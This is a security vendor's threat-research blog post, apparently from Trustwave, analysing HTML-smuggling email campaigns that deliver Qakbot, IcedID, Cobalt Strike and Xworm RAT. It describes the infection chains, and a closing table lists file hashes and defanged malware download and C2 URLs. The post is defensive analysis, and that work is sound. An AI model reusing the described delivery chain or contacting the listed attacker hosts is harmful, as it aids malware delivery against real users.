HTML Smuggling: The Hidden Threat in Your Inbox
Last October, Trustwave SpiderLabs blogged about the use and prevalence of HTML email attachments to deliver malware and phishing for credentials. The use of HTML smuggling has become more prevalent, and we have since seen various cybercriminal groups utilizing these techniques to distribute malware.
HTML smuggling employs HTML5 attributes that can work offline by storing a binary in an immutable blob of data within JavaScript code. The data blob, or the embedded payload, gets decoded into a file object when opened via a web browser. Threat actors take advantage of the versatility of HTML in combination with social engineering to lure the user into saving and opening the malicious payload.
HTML smuggling is not new, but it has gained in popularity, especially after Microsoft started blocking macros in documents from the Internet by default. What did not change is the use of HTML smuggling to deliver the initial payload. The intermediate payload varies from ISO, IMG, and VHD image files.
The latest campaigns impersonate well-known brands like Adobe Acrobat, Google Drive, and Dropbox to increase the chances of users opening the archives.
In this blog, we will cover some notable malware strains that have utilized HTML smuggling in their infection chain and provide a brief analysis of each malware.
Qakbot
Qakbot, one of the notorious malware types actively distributed through spam, has been using HTML smuggling since June 2022. It shifted from macro documents to HTML as Microsoft pushed restrictions on using macros from the Internet.
Figure 1: Qakbot is delivered via HTML attachments as seen in our spam traps.
A Qakbot email campaign from September 2022 uses a plain template and does not impersonate well-known brands. Instead, the malware tricks the user into clicking the HTML attachment, which causes an encrypted ZIP archive to be saved to disk. The email and the HTML attachment contain the password to extract the ZIP content.
Figure 2: Spam email delivering Qakbot via an HTML attachment
Figure 3: HTML smuggling template
Looking at the HTML source code, the functions, and methods used to assemble the payload are obfuscated into arrays. This attempts to conceal suspicious commands and evade email gateway filters. This technique abuses the JavaScript function msSaveOrOpenBlob to dynamically generate and drop the malicious payload to disk.
Figure 4: Obfuscated JavaScript code used for payload smuggling
Figure 5: ZIP archive drop containing a Windows Shortcut LNK
The ZIP archive dropped contains one file, a Windows Shortcut (LNK). Once the user opens the ZIP archive and launches the LNK file, it invokes the Windows Command Processor which creates a download folder inside the %LOCAPPDATA% directory and downloads and executes a JavaScript using the built-in curl tool and WScript, respectively. The JavaScript file downloads the main payload, a Qakbot DLL. The payload is loaded using rundll32 and then injected into explorer.exe through process hollowing.
Figure 6: Infection chain of the Qakbot campaign
Figure 7: Qakbot campaign impersonating Google Drive
IcedID
Another infamous malware strain, IcedID also known as Bokbot, has been observed using HTML smuggling. There is some overlap in the method of delivery between IcedID and Qakbot, as the HTML templates we saw were nearly identical.
Figure 8: Thread-hijacked email delivering IcedID
Figure 9: HTML template spoofing a PDF viewer to lure targets to install IcedID
In this sample, IcedID was delivered through a thread-hijacked email with an HTML attachment. A thread-hijacked email contains malicious messages, links, or attachments that were inserted by threat actors into a legitimate email conversation. After loading in the browser, the HTML, impersonating a PDF document viewer, drops a password-protected ZIP archive with an embedded ISO disk image file. The HTML template contains the archive’s password. Inside the ISO file is an LNK file, a decoy PNG image, and the IcedID DLL. Clicking the LNK file starts the command line to load the decoy PNG image, while in the background, rundll32 loads the initial IcedID DLL with the PluginInit parameter.
Figure 10: Command line to load decoy PNG image
Figure 11: Infection chain of IcedID campaign
Since 2017, IcedID has implemented a range of delivery methods favoring email as its initial access vector. It started as a banking trojan targeting financial institutions but has since evolved into a dropper of additional malware payloads, like ransomware, and has become an initial access provider for other threat actors seeking to establish a foothold on a target system.
Cobalt Strike
More recently, in December we came across a spam email with an HTML attachment dropping Cobalt Strike. The HTML lure looks similar to the Qakbot and IcedID campaigns.
Figure 12: Infection chain of Cobalt Strike delivery through email with an HTML attachment
Figure 13: PDF viewer-themed HTML lure delivering Cobalt Strike
Figure 14: ISO package containing LNK shortcut, PowerShell scripts including Cobalt Strike, and a decoy document
When the HTML is loaded, it drops an ISO file containing an LNK file that, when clicked, launches the payload execution sequence. The LNK file starts PowerShell to execute the PowerShell script masqueraded in a ‘.log’ extension rather than ‘.ps1’. Modifying the extension attempts to evade defenses and tricks the user into thinking that it is a typical log file.
Figure 15: PowerShell script
The initial PowerShell script sets the groundwork for the successful execution of the Cobalt Strike payload. The script checks if the target system is part of a domain. Then, it disables Microsoft Defender’s real-time monitoring followed by the creation of an LNK shortcut file pointing to the Cobalt Strike payload in the Startup folder as a form of persistence. Otherwise, it loads the decoy PDF document and terminates the sequence.
To conceal the malicious activity the script loads the decoy PDF document before launching the main payload.
Figure 16: First stage PS1 script disabling antivirus, checking the system configuration, and setting up persistence
The initial and main PowerShell scripts simply obfuscate their variables and functions using random and lengthy names. For the sake of readability, we have modified the variable names making them shorter.
Figure 17: Cobalt Strike with base64-encoded shellcode
Before memory injection, the Cobalt Strike shellcode decodes from base64 then bitwise XOR with the key, 35. It connects to its C2 server at hxxp[://]165[.]22[.]48[.]183/common?chunk=false.
Xworm RAT
One of the interesting samples we uncovered in our spam traps is an Xworm RAT, which is a .NET-compiled malware capable of monitoring user activities including keystrokes and screen activities.
Figure 18: Email campaign delivering the Xworm RAT
The email purports to be from the U.S. Postal System with the subject line reading “Your shipment is out for delivery” and includes an HTML file attachment. When the recipient opens the HTML, it will be loaded in the browser and automatically drops an ISO disk image to the target system.
The ISO file contains a Visual Basic Script (VBS) file. The user must open the ISO file for it to be mounted and double-click the VBScript code for the infection chain to continue.
When executed, the VBScript code launches PowerShell commands to retrieve two encoded blobs. Below is the final PowerShell command launched:
Figure 19: Final PowerShell command launch
The first blob is retrieved from hxxp://5[.]42[.]199[.]235/dll/dll2.txt. Then, the PowerShell script decodes the base64 encoded blob into a DLL file. This first DLL has the following capabilities:
- Creates a copy of the VBS file in the Startup folder
- Sets the VBS persistence through a scheduled task
- Downloads the stager DLL which will serve as the loader of the second blob or the main payload
The second blob is downloaded from hxxps://beautiful-elion[.]68-64-160-26[.]plesk[.]page/weslle.txt. Like the first blob, the base64 encoded file is converted into a DLL file. We found that this main payload turns out to be an Xworm RAT.
The code shown below is from the first DLL, and highlighted is the method “PUlGKA” which is invoked through the VBScript command. It downloads and decodes the stager DLL from hxxp:// 5[.]42[.]199[.]235/pe/Pe.txt. From there, the stager manages the execution of Xworm DLL through the built-in Windows command Regasm.
Figure 20: PUlGKA method
Figure 21: Attack sequence of a campaign that starts from email then ends with Xworm RAT dropped.
Conclusion
The shift in malware delivery methods to using HTML is concerning, as it challenges email gateway scanners, endpoint protection, and security solutions, especially their ability to unpack, decode and detect such techniques. With HTML smuggling, the malware is concealed from the scanners as most AVs will see the HTML attachment only compared to using an ISO file attachment, which will immediately throw red flags. Combining HTML smuggling with archives and disk images as intermediate payload raises the chances of delivering malware and gaining initial access. Threat actors are crafty in their lures, mixing various social engineering techniques and exploring different attack chains to gain a foothold on the target’s system.
We expect to see more sophisticated malware delivered through HTML smuggling with more compelling lures impersonating well-known products and social engineering tricks, complex obfuscation on the HTML level evading signature-based detection, and diverse attack sequences that may require more user interaction but may still be effective to gain initial access.
We always remind everyone to stay vigilant in this ever-changing digital landscape.
Indicators of Compromise
Qakbot
Document1611.html |
b79ff504eb6ec509b8b6b870dc2f0113825d859b |
Document1611.zip |
b5da32a803b31d769d4d330e9c923d8c2dc5da1f |
File577.lnk |
d92b31ddf25e30e7cc34239bf45c7ec913b713c4 |
enhrP.s_1L.QH0w.js |
0d17a7f60f7f5a6d5e00ed23635dd4998a5df307 |
_OIV.dll (Qakbot DLL) |
78542b48745136d9e77896ec77c7613c4386ad81 |
jackboots. tmp (Qakbot DLL) |
ed67cb8a6c44871ec6ffb6517d77b5e84f00b399 |
PE40.vhd (VHD containing Qakbot) |
55781d120a91b71da2c51ed3657a73e819493f38 |
Download URL for JS |
hxxps://purepowerinc[.]net/nluGZ/082.html |
Download URL for DLL (Qakbot) |
hxxps://huhuwarcanoefestival[.]com/iSx1Ch/0509.html |
IcedID
alljumping,doc,09.30.22.html |
07251deafd605437a25d51428aade79255036d49 |
3ebdb69f-1430-4414-ace5-a413e8bdb9cd.zip |
df3f2f97383d4ae897b3197e8d07f474f651a053 |
scandocument-83848d84-c26a-4bc9-95f5-10f288709ff7.iso |
cffb01d11245792b5498c051603a279b0ad1930d |
scandocument-83848d84-c26a-4bc9-95f5-10f288709ff7.lnk |
702631c91a8fe86b2e75f4a6b089d00b7762ff1b |
0e7132bf-c75b-4ff9-ab6a-0db25f7250a4.W6_ (IcedID DLL) |
15f8a879534143a4169c6ecd1d56132d1908443d |
d5216149-74d2-4662-a923-3ea963ef2a5a.png |
b6b61511ea7a36015f8002922bc20ad1f42234ab |
CobaltStrike
a5c7f1e3-e33c-4dd8-bd27-f40fba04cb5d.html |
ce4611b2d2e326ff7b37acdc10636f0dcd9439ba |
Bill-1208-1113add9551798.iso |
63adbabf3dfde36e745f4c42979260a2e946848c |
Bill-1208.lnk |
0afe54c016f4770ad2a8690ef9a06b1f53804215 |
bbftullzytwpbp.log (PS1 stager) |
23b950b209cb16b084cad87c006dc7691c60dc40 |
fwoebcdndjhrmrn.log (PS1 CobaltStrike) |
4b9d2f4b80ef9578711c569524694905012a8080 |
vqulmjurow.pdf (Decoy PDF document) |
fbc916f065157cc5a13f22453c19f7dfecc3c228 |
C2 server |
hxxp[://]165[.]22[.]48[.]183/common?chunk=false |
Xworm
ERYASZBM279.html |
207b87124f8abe2226251eb84f033e8642418fb1 |
US-ERYASZBM279.iso |
e318c01fcd1f711fd063e845ca2431012086658f |
us1012401.vbs |
35b9fd8856edd443a4e27727c54dd135e26220bd |
dll2.txt (Initial DLL) |
efd195d8ef795e123bb1c1faee77459a781c003e |
weslle.txt (Xworm) |
8cb57a7e1e929c48716974edf55df2e9456d1443 |
Pe.txt (Stager DLL) |
7a7e76553dafc2c1b6a0d804aa540ab7a80fd77b |
hxxp://5[.]42[.]199[.]235/dll/dll2.txt |
|
hxxp:// 5[.]42[.]199[.]235/pe/Pe.txt |
|
hxxps://beautiful-elion[.]68-64-160-26[.]plesk[.]page/weslle.txt |
|
ABOUT TRUSTWAVE
Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.